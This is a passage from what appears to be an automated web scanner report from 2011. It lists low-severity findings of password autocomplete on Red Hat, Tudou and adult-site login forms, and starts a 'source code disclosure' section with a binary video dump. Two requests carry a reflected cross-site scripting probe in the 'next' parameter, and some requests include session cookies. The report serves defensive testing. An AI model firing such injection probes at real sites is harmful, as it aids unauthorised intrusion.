<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>redhat
...[SNIP]...
<fieldset class="narrow">
<form method="post" action="/wapps/sso/login.html">


<div class="rowform">
...[SNIP]...
</label>
<input type="password" id="password" name="password" maxlength="45" />
</div>
...[SNIP]...

9.13. https://www.redhat.com/wapps/ugc/register.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.redhat.com
Path:   /wapps/ugc/register.html

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /wapps/ugc/register.html;jsessionid=i3aaZtOnOMF4S30iWROsiQ**.4b748952?_flowExecutionKey=_cF7B3B892-4CEE-2290-D8A6-E69E0CDC508B_kC88A76EF-152B-F83F-175E-9854DABB8DB9 HTTP/1.1
Host: www.redhat.com
Connection: keep-alive
Referer: https://www.redhat.com/wapps/sso/login.html?redirect=%2Fwapps%2Fstore%2Fprotected%2Fpurchase.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=i3aaZtOnOMF4S30iWROsiQ**.4b748952; rh_omni_tc=70160000000H4AjAAK; s_ria=flash%2010%7Csilverlight%204.0; s_vnum=1316027200761%26vn%3D1; s_vi=[CS]v1|2724B704851D0F89-60000130E007A637[CE]; www-session-id=8ccce98baea8ecd121b0a86afe4a630d; rh_store=ver%3D1.4%3Bline%3DRH0844913%3A1%3Astrue%3Ad1313435219589%3Ad1344971219589%3A-1%3Acnull%3Afalse%3Anull; s_cc=true; s_nr=1313435299756; s_invisit=true; s_sq=redhatglobal%2Credhatcom%3D%2526pid%253Dhttps%25253A//www.redhat.com/wapps/sso/login.html%25253Fredirect%25253D%2525252Fwapps%2525252Fstore%2525252Fprotected%2525252Fpurchase.html%2526oid%253Dhttps%25253A//www.redhat.com/wapps/ugc/register.html%25253Fredirect%25253D/wapps/store/protected/purchase.html%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 27384
Expires: Mon, 15 Aug 2011 19:07:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Aug 2011 19:07:26 GMT
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>redhat.
...[SNIP]...
<!--
Start form
-->
<form id="userWrapper" action="/wapps/ugc/register.html?_flowExecutionKey=_cF7B3B892-4CEE-2290-D8A6-E69E0CDC508B_kC88A76EF-152B-F83F-175E-9854DABB8DB9" method="post">


<!-- Hidden variable to support two-way prop values -->
...[SNIP]...
</label>
<input id="password" name="password" type="password" value="" maxlength="18"/>
</div>
...[SNIP]...
</label>
<input id="passwordConfirmation" name="passwordConfirmation" type="password" value="" maxlength="18"/>
</div>
...[SNIP]...

9.14. http://www.tudou.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tudou.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.tudou.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: tws0.3
Date: Mon, 15 Aug 2011 18:55:46 GMT
Content-Type: text/html
Connection: close
Last-Modified: Mon, 15 Aug 2011 18:53:30 GMT
Content-Length: 247630
Expires: Mon, 15 Aug 2011 19:02:36 GMT
Cache-Control: max-age=420
Vary: Accept-Encoding
Age: 10
X-Cache: HIT from www.tudou.com

<!DOCTYPE html>
<html>
<head>
<meta charset="gbk"/>

<title>......_...................._............,............,............</title>
<meta name="Keywords" content="......,....,....,........,...
...[SNIP]...
<div class="c">
                   <form method="post" action="http://login.tudou.com/login.do?act=login&amp;service=http://www.tudou.com/">
                       <p>
...[SNIP]...
<span class="lg_i"><input type="password" id="pwd" name="password" class="text" tabindex="2"></span>
...[SNIP]...

9.15. http://www.xhamstercams.com/cam/Juicy_Jules19/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.xhamstercams.com
Path:   /cam/Juicy_Jules19/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /cam/Juicy_Jules19/?gl=1&AFNO=1-0-624213-344279&UHNSMTY=458&lp=3 HTTP/1.1
Host: www.xhamstercams.com
Proxy-Connection: keep-alive
Referer: http://xhamster.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NaiadJP=cj1odHRwJTNBJTJGJTJGeGhhbXN0ZXIuY29tJTJGJmU9aHR0cCUzQSUyRiUyRnd3dy54aGFtc3RlcmNhbXMuY29tJTJGZXhwb3J0cyUyRmdvbGl2ZSUyRiUzRkFGTk8lM0QxLTAtNjI0MjEzLTM0NDI3OSUyNlVITlNNVFklM0Q0NTglMjZERiUzRDAlMjZscCUzRDMmbz0xMzEzNDM0NTg2

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:56:48 GMT
Server: Apache
Set-Cookie: fcact=fcA6_2502%2F2Z; expires=Mon, 22-Aug-2011 18:56:48 GMT; path=/
P3P: policyref="http://www.streamate.com/p3p/ns.xml", CP="NOI DSP COR CUR ADMa DEVa OUR IND UNI STA"
Vary: Accept-Encoding
Content-Length: 32305
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Free live video chat, free nude cam, sex shows, adult streaming, free porn - XHamsterCam
...[SNIP]...
</p>
<form action="http://www.xhamstercams.com/login.php?AFNO=1-0-624213-344279&UHNSMTY=458" method="post" accept-charset="utf-8" name="loginform" id="loginform">
<input type="hidden" name="AFNO" value="1-0-624213-344279">
...[SNIP]...
</label>
<input type="password" size="8" name="sapwd">
<input type="submit" name="login" border="1" id="goBt" value="Go">
...[SNIP]...

9.16. http://xhamster.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://xhamster.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: xhamster.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.52
Date: Mon, 15 Aug 2011 19:04:10 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.2
Srv: m5
Set-Cookie: adNum=387; path=/
Vary: Accept-Encoding
Content-Length: 59237

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>xHamster's Free Porn Videos</title>
<meta name="description" content="xH
...[SNIP]...
</div>
<form id='loginForm'>
<table cellpadding="0" cellspacing="0" style="display: table;">
...[SNIP]...
<td><input type='password' class='inp' name="password" id='password'></td>
...[SNIP]...

9.17. http://xhamster.com/login.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://xhamster.com
Path:   /login.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /login.php HTTP/1.1
Host: xhamster.com
Proxy-Connection: keep-alive
Referer: http://xhamster.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ismobile=0; stats=54; prid=--; prib=--; TmplClickPopLayer=1; sc_limit=1; __utma=26208500.868426551.1313434646.1313434646.1313434646.1; __utmb=26208500.1.10.1313434646; __utmz=26208500.1313434646.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); adNum=386; mdg:uid=215%3Aa2

Response

HTTP/1.1 200 OK
Server: nginx/0.8.52
Date: Mon, 15 Aug 2011 18:58:26 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.2
Srv: m3
Vary: Accept-Encoding
Content-Length: 11903

<html>
<head>
<title>Login Form</title>
<meta name="description" content="Login Form"/>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name ="keywords" content ="porn, free
...[SNIP]...
<TABLE cellSpacing=0 cellPadding=0 width="100%" border=0 bgcolor="#FFFFFF">
       <FORM name=loginForm method=post action="http://xhamster.com/login.php?next=">
<TBODY>
...[SNIP]...
<TD style="PADDING-left: 5px;"><INPUT size=16 tabIndex=8 type=password name=password></TD>
...[SNIP]...

9.18. http://xhamster.com/signup.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://xhamster.com
Path:   /signup.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /signup.php?next=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000259)%3C/script%3E HTTP/1.1
Host: xhamster.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Server: nginx/0.8.52
Date: Mon, 15 Aug 2011 19:04:00 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.2
Set-Cookie: ismobile=0; expires=Mon, 22-Aug-2011 19:04:00 GMT; path=/; domain=.xhamster.com
Set-Cookie: stats=74; expires=Mon, 22-Aug-2011 19:04:00 GMT; path=/; domain=.xhamster.com
Srv: m4
Vary: Accept-Encoding
Content-Length: 29184

<html>
<head>
<title>Register</title>
<meta name="description" content="Register"/>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name ="keywords" content ="porn, free porn
...[SNIP]...
<BR>
       <FORM id=loginForm name=loginForm method=post action="http://xhamster.com/login.php?next='"--></style>
...[SNIP]...
<TD><INPUT tabIndex=2 type=password name=password></TD>
...[SNIP]...

9.19. http://xhamster.com/signup.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://xhamster.com
Path:   /signup.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /signup.php HTTP/1.1
Host: xhamster.com
Proxy-Connection: keep-alive
Referer: http://xhamster.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ismobile=0; stats=54; adNum=12; mdg:uid=940%3Aa5; prid=--; prib=--; TmplClickPopLayer=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.52
Date: Mon, 15 Aug 2011 18:56:29 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
Srv: m10
Vary: Accept-Encoding
Content-Length: 29083

<html>
<head>
<title>Register</title>
<meta name="description" content="Register"/>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name ="keywords" content ="porn, free porn
...[SNIP]...
<BR>
       <FORM id=loginForm name=loginForm method=post action="http://xhamster.com/login.php?next=">
       <TABLE cellSpacing=0 cellPadding=5 width="100%" border=0>
...[SNIP]...
<TD><INPUT tabIndex=2 type=password name=password></TD>
...[SNIP]...

9.20. http://xhamster.com/signup.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://xhamster.com
Path:   /signup.php

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /signup.php HTTP/1.1
Host: xhamster.com
Proxy-Connection: keep-alive
Referer: http://xhamster.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ismobile=0; stats=54; adNum=12; mdg:uid=940%3Aa5; prid=--; prib=--; TmplClickPopLayer=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.52
Date: Mon, 15 Aug 2011 18:56:29 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
Srv: m10
Vary: Accept-Encoding
Content-Length: 29083

<html>
<head>
<title>Register</title>
<meta name="description" content="Register"/>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name ="keywords" content ="porn, free porn
...[SNIP]...
<BR>
                       <FORM id=signupForm name=signupForm method=post action="http://xhamster.com/signup.php?next=">
                           <INPUT type="hidden" name="prev" value="">
...[SNIP]...
<TD><INPUT type=password maxLength=20 name=password1></TD>
...[SNIP]...
<TD><INPUT type=password maxLength=20 name=password2></TD>
...[SNIP]...

9.21. http://xhamster.com/signup.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://xhamster.com
Path:   /signup.php

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /signup.php?next=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000259)%3C/script%3E HTTP/1.1
Host: xhamster.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Server: nginx/0.8.52
Date: Mon, 15 Aug 2011 19:04:00 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.2
Set-Cookie: ismobile=0; expires=Mon, 22-Aug-2011 19:04:00 GMT; path=/; domain=.xhamster.com
Set-Cookie: stats=74; expires=Mon, 22-Aug-2011 19:04:00 GMT; path=/; domain=.xhamster.com
Srv: m4
Vary: Accept-Encoding
Content-Length: 29184

<html>
<head>
<title>Register</title>
<meta name="description" content="Register"/>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name ="keywords" content ="porn, free porn
...[SNIP]...
<BR>
                       <FORM id=signupForm name=signupForm method=post action="http://xhamster.com/signup.php?next='"--></style>
...[SNIP]...
<TD><INPUT type=password maxLength=20 name=password1></TD>
...[SNIP]...
<TD><INPUT type=password maxLength=20 name=password2></TD>
...[SNIP]...

10. Source code disclosure  previous  next
There are 10 instances of this issue:

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.


10.1. http://content.pop6.com/banners/aff/35057/120x160/120x160_Dayss.flv  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://content.pop6.com
Path:   /banners/aff/35057/120x160/120x160_Dayss.flv

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /banners/aff/35057/120x160/120x160_Dayss.flv HTTP/1.1
Host: content.pop6.com
Proxy-Connection: keep-alive
Referer: http://content.pop6.com/banners/aff/piclist/video_piclist/35057/120x160/PG_Dayss_120x160.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS) mod_perl/2.0.2 Perl/v5.8.8
Last-Modified: Thu, 09 Dec 2010 17:24:40 GMT
ETag: "13049652-4dafd-496fd8343e600"
Accept-Ranges: bytes
Content-Length: 318205
Content-Type: text/plain; charset=UTF-8
X-Cache-Lookup: HIT from origin.friendfinderinc.com:3128
X-Cache-Lookup: HIT from origin.friendfinderinc.com:3128
X-Cache-Lookup: HIT from origin.friendfinderinc.com:3128
Date: Mon, 15 Aug 2011 18:56:02 GMT
Connection: close

FLV.....    .................
onMetaData....
..duration.@.ffffff..width.@^........height.@d.......videodatarate.@.p......    framerate.@.........videocodecid.@.........canSeekToEnd....    ......'j.........    onXMPData.......liveXML.'J<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 ">
...[SNIP]...



<?xpacket end="w"?>...    ..'u    ............xF
.
.?j.x.........Pi.....1../......E...R'..U7...w.......l.Py[....J.}..z_.....o..Ao...d.6..../......o..E.........    .[e...o.....!h.....w...:......3.......&%-\{.4..{..g..n:.{.,..A...
...[SNIP]...
<........q..t....+f.U8h.......
..#.Wr@..#.&u..d.>QH.....}`XM!..Z..:...9..s.    .D.=<?k"R-...{s..z.c.B....hF..*.V.z.Mo.......u.WY.t...z....m.}\.8...Y.gp]...d..?W.^.K........R.[.......p'.IB.KL.|!....2....!.T.CV...K.0........AY.......*...U...<.O.r...]..x..tf.{.........O....(oi..9.!..)C....j<    ...h.,..Q.O,.N.a.F..
/.s........>'Ie.2V...?]@.N:..2.>.Y[.......:.!..lr.........6..1.._..6.....M....c.'.^.E..U..    k.}2..p......[0.X.9..9@..V]lR]........}..)....d..GdW2(..V.hP..k.4hA.N+iH....]..F~)...f.;..un.c2:.-......r.4...t*`i.\w.gV[.2}.....*....J.x..?H....}.rq.....$,.....leQ..L~.:.....A..'L'@..Q.t.J8.*8..9.}S.\.....x......e    .f.j:...0m..d..8/...c...9Gj..x! Z..vJ;..`M.....:.........l.cSR:=....0........g........VO.._..u+.J.......oY..#S.M..'......|`.+.o..<..s;.....?T.
..y....~.......$.........R.._.|.P..
|_..D.......>.....7.|.&.6#..8.^..a..j...q~z..h~..=,.`..4......../..i0.....:.b.:
.p8C...^..$1.J..x...#}.~[J.....S.......p.).y0..,..HV.IF.......P.fO...".."o......".....n......HNd..}=..._@.zdT.Y7...No...Sr..a.V
.fo,..o.V. ..E....S...j}.{
.+zr\C.F.....C.,qr1.......&..2.....8..,M@h.......c")..6.)....Y.F..@N! .8;.......a.....Cn..D)lO|O@.@......<...`.]l.:....S9..j\<.W...@"..x.@..r{.].Vpu..|..5.
.#4..^(..O.mU..0.e9..JFoH......<P..4...(.%}.....{.8.V.......?.h......+{...%-.%i...1......@......v.....|u.|.Ib.-....zu.......r}RhG.......5..b.d._)...........>.l...3.....O.9
{..UM.J.a...;2.R..]M-<f.]T.....9TC...U.M..KT.m.;...W.dr..?..o....6.^A...cq....a....ZTDu..DH.'..Y........L...zN/......M.~Y.{Q'...9........6e..=^.k..~........+O.b..pp....EC>.I..L;.?..)~+;.j .l..D..-......Ol.,..t".v.....}..!.K.C[.0.D6'.............(11.I_..A..K....j.BW..'~9.k...'...!.W..a#...THw.u.mi.e..n=.(...y.?....#.5.&}...gy.Nbp..!m..c.!.(..+.P..?|.+...*..:.......+.....+JUg..Y..[...K...a{... ...U...8.....H.}...p.....v...~...Gxo..n.M.6H-..T._.I.[-.@.......e..?.P.$.0.w=..[.c.C.4.@.-...B:.'..^5    ]V.'=....T.(..pa..R.......&.%.._.......q....,.lN.9k,)+.......\......Va.."A...\......):&..K.../.[...Z..n..K.Ib.mW.....I..$.D4....l.fh....Z....Wx&.X...    r.`a=.A.....r.X.k}.....~.q3h.w..P...`/G}..2.Z+.>[..aSo*.IX.m
....K3..6...zjG....O..N.%.:.9...f......=...6    s...a....glq#D5..XJG.h.C....=..].'-...z92....5>.`....:.
Z.PL?......l..1.
..i.....U.n.)T
4./....L.....Q.k...I.$..&..6....~c.....#......~.........
..I......9
a...G.Z.E$D...1..x..]...D.P..Z@]..V..6.)...:.....{....."....8.5BwD....Lp..Z..1...04...R...pw......gQ.-..n.    ..U....d.7
G..w....$#....,..%w`.!..&.........-#.)9...62.....s.upM.#......Z.......W..|,..y;.~7..Y.4..9.0.p...E.@.U...R......Kb;P.._._...ht.t.70...l.l.....
.    ..........$..Y[.Z_TFq..7.w....s.WL.j#.X.hX....^29TV...(_o..J..j....Z.t+.W[h    .YX.*.&.!..4.#.MK..K........Y.L'Qy~g.?~38*^4.."\.......\.`..Heu..a..0..*..d...l..<.H..M.,...R.G.w?....4....p......@..
w...n.A;..bO.
4........U._..<..3.z...S....n.F..n..G.....\Q.Q.$c.....W..[k........U....#...XJ.\$.......D......H.2....);..*......6.~.8....S#'.q..].d.w.%.    .`g....&..D.....{.A.\..|.i..".O.
.......!..W.._o"...D..O.....:.P..."......*3....2....>.6........&.v...iw....<%v...<..u}EJ5..r.XQ.e"/...x.6....c/........t:&MZ....b.p20w....s.t.dD`S3".mT..V.A=)..%....V...z3.....=KR...SK..._nt..............+...0.]....n~.........+0..0H...-P.).o.....c...$k......4...`...>..x~.Hf.H.Z.x.. ..k0&w.+b.....].a.r.aTA.^.q....oz..2.e.rf...mD.0...q)..U ...P.......z.5@.Nq[d^.31HT..'.,C.....l(.~.AU.{U..d...Z....7.....!...........TP..@.G.)......Pb..........w....,L..B.S.#.r..    '.... ..=....g....v.7..ja/s.|a>..Wz...J\...Ts..f=n....B./....t...A=RSlk5..v.w.A....lg.O!.@.g.).
u...e...:e.    ..s_6.U.    ..j'.....4..2.........J...>....7...=... 5.    5...
h..E.(....(...>2d..h..?.*l.N..{ ....O.......V.a.1:.".......,9{$.Sl......sv..w8.P.....E...2..2.}.........D......G..@....L<.........F......|..]U_|,....|.....F..7......|L.u..~......EPa.l3._:.d.G@.Tf\Y..
...2..t.....Q..).7"G..}....c.9f.hK.....:.....N@.Y-....9.......CE..J.4"43...4Rk8.....Sj"......u.......l..........*.7.....kF..z...#.g....;.Z..]...)*h.4.(n... .I?.....+.}.....6.'..y..d..1..X.......3.P;6.......l........    ...Y..wKYNe...&....6....oU......Z.;.!Wd9".(Y.<;.PS.^..q....;^..i..nF.n..........Y"%UA.$5.[.}.a.k...W..^J^Z..V..0...7....W..Ys..........^.+....2.&)......m...r.......E..Q...7.....7...F.....3.<.F...../Lt.(.-r.I.q.l/......Z..^...$...
B.......v..t*k.-5......^=.&0..f....=.~..l.4s.\mg.....p....dt}.&..2.....Y1)q.y...$..sS.......nhk.|....g.v!.?..M.5..).r
J..qp$..R@...^..d..k..>$M.r.C...X....<.z!.j..`8m&'3C.f.mbD.)...8W^(.z.t..e......_z..J8....E...@].'lw%F.N.c
.....81c.2dE.NA.E(.._s...&.s....o......JD0...
l.|..d..e..<.DO/L0...~2].....;L..(r.1.zO.....Z.vq.....P.@.:....`QP[2.F)..?.d....'..s.Pj......j7....    .j%9.'R.B.........n.._.F.8.G.b..6(.t.l...5...H..xj..!.0.+..."]..UNU9..@y..~....F.    ..s.....fa=......
_.$..r....IA...y.}...W...N^".:...;.S.-^.Q.O...zv.e...=!...F2..L.z.b.3..y..p...J{.d..9....0.xbQ.9U.Q..0.P.....xg.....B...A."..Vd.,.j...4.d.....8..5l..'y*.9..j...{T(..w.).r.{O.f../2.v.Q...L.$.........R.o....N......KPUs.:.]...-. /[......^2;J...nV ....    .....V.uV.5'...Z...    .3........>%.0{..4...~.A..e
<..8}..t..>A....F.}..]0.#.....n.e....KpJ.~D.,/.=.lc,......-.:..5|..D.4.w...!....%.....    ...0_...4...2n...\zU...P.e~.....(+@N.\....8.YJq....L...b.`.l...1..P..-....L.9.....E[.... 3I.'=\F......~..r.Ff?."{,....\.@K.....<.(......v;.P..._'c.+.;?.%.Cr......]/yw,d..o.$...t..D.^2e_......&.J.q;l$P....C.u.......G?...nmD.+.WiX...p%.7(.yKM..0.z...._)\.... ........E#*:.8..3..P.h<.?..K.....B:...,Dh..?..B?.\......).6..=[.B.p.l...'7E...|.o&...G..u.*..X[8..9.B..2.....b_.
f..qT..o=G'.........k..P..*...
.i>......
#..........pG.`..S).e.....?.......S...B.?._N.......L...........m...;....\ahc....P................o..q5.....%.3.Y.dh.p..T.%7....)..&,........4.)&l.Y>`...S.....'Op..v.K~D..b.....(..>...i..psrK2.m[.*.........[..,^..Z...-.....P......i...s.........9.XF..of..h....G....`8oF|3...e2...C6.E..l...f....z...An-.......K.........    ..........$..Y..k..M...}/}D....J... ..!g..v .b.(4.`......$>2..+ s.....Vk...3.\R=..d...$L/...
...."...$J.V.#I$..,..JtF....M`D
....z4l.vr......A......Q.u../.}.5\.....x...gq.'..LB....&...2.(.C?G....d0.t].V+.>Y9.........b.*<.......@F...Z.......<.......yK...S.R..S:wp.y\,o.Q.y0..z......6    .NX.....P...h@.$......,t.U..!o.jA.\.}a.o.#...o......*$/..Hd.NM...A..p.#l..,.L"    ..;..P.%.Z..P.M,....h... ...7[c........q0c..4...d........B.*i.].*.]..h.%..)...1'p.[.)..u.....9...H7.)..C.5...0. ...x..q..m'ZX.O.=C..T}..x.......L..z.-p..[....._;...d.....${.,..V.riM...j...#...+...    R....4..3.....a...7.
.KY.R..D..w.g.......Q.....w.m.+....:....9`.$.)+$.).5...z....FI!.^j*c.~..$.;...........w9.7.......9.Y......h,it....W...JYZ%...M...T:.....?.p}...g."............{...8...M|...D.4,....@.... ........g..%......f...h*>..Ni.e..-W.
b..>..xA.=u....@.Sv`4..D.....+".#..i@#..    ...`.
....v.4;....ie...DP~.|?..v.......4......(B.%b...K.......J.0..4.......Q..[..huQe.=_...>..xE....-.d?..1:.+..k.........i%..1.....b..Q.2.@.*.[l....#..h.
...wx.......fJ.{P.e.+....0......+.=.%*V~.
...X3...>LK..._.....O.d..2...lj.6!Z^.p4...a.jL...X...f.b.....K........l...'..'{...u!..:.................:.........fB..R..}y0..V..F.S....c.U.G-3......-..........0....?.?..\.\..,.H...*.].1..4...(.R...H....w9.S]..2........K..2......pA.*.......c.kmz..Zc.%...N...d..[s    .....N.N..V.....    */Mq...O{;...3......g@~ SP}.P:..@0...r.......m.f.s..mR.0Q......;.+.jz...1.o.M.....CxrYA%Cd?..>p..,.T.N..'..Gq.;L?%.G...b..k.a..5e.y....4.~..o.T..?g.......B. .....g........2.>D? .'...?.k.....:. kn.....>5w..f...Q...F........3...j.....D....[...D6yy.U..z...........7j....1.+x{7?;.+.M..l....... a.O\.bh.>HOa..    ...."E...._....+...:L(..4.{a3!.mK....I.d.,{..]o......M)m....j......v....*;i.?$.R..#.K.^.._.L..1.3.[9[........<{...;.3>.w...[.d.R=...........q'.U...rWP}...c..I........~x.J..'.b.vO.s...*J..n...9..<M}....,..\...L..29UV.MTI...ij..\s...c..oM....;...X.r..&v5.3...V..u"..Z....d-..<...|.w.I..Mh..gF.j..rfg<.j}..\{~..W.E..d6H..A%F....-...b.NP+z.4T....X.    L..RY"..?..K*....3.[...6.d..9Y..#^.d...mj...(.. h#....a(..k.n3.xv......q...i......Qj...EmS.....=..h..c.r...y..W......p...V........    ./.$?.y.c.F...y.=U1]....E....yjR.....5m.....K.:V5..|..)L9[(.0.G.....&.F....,j....,..u..d`s.-.....$8..M..oA.{P.....e.................#.N...3F..J...h..:..Ovm..n.K...2*/..Y......}.8&0...=.5..F../.....1.69bK|.|...GH.K..$
